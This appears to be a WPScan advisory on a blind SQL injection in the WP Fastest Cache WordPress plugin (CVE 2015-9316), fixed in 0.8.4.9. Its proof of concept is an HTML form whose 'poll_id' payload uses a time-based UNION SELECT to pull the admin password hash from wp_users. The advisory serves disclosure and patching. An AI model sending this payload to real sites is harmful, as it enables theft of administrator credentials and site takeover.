WP Fastest Cache <= 0.8.4.8 - Blind SQL Injection



Description
According to the researcher, for this vulnerability to be present WP-Polls plugin also needs to be installed.
Proof of Concept
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
	<input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
	<input type="submit" value="Send">
</form>

Affects Plugin

fixed in version 0.8.4.9

References

CVE 2015-9316
URL http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 4368
Verified No
WPVDB ID 8229

Timeline

Publicly Published 2015-11-12 (over 4 years ago)
Added 2015-11-12 (over 4 years ago)
Last Updated 2019-11-27 (7 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin